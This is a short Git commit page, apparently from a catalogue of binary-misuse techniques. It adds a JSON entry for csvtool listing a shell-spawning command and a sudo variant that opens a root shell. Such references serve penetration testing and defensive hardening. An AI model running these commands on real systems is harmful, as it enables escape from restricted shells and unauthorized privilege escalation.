add data source for csvtool

master
Mr. Robot 3 years ago committed by GitHub
parent 2f2197b1a3
commit cecd527e0b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -0,0 +1,14 @@
{
"functions": {
"shell": [
{
"code": "csvtool call '/bin/sh;false' /etc/passwd"
}
],
"sudo": [
{
"code": "sudo csvtool call '/bin/sh;false' /etc/passwd"
}
]
}
}
Loading…
Cancel
Save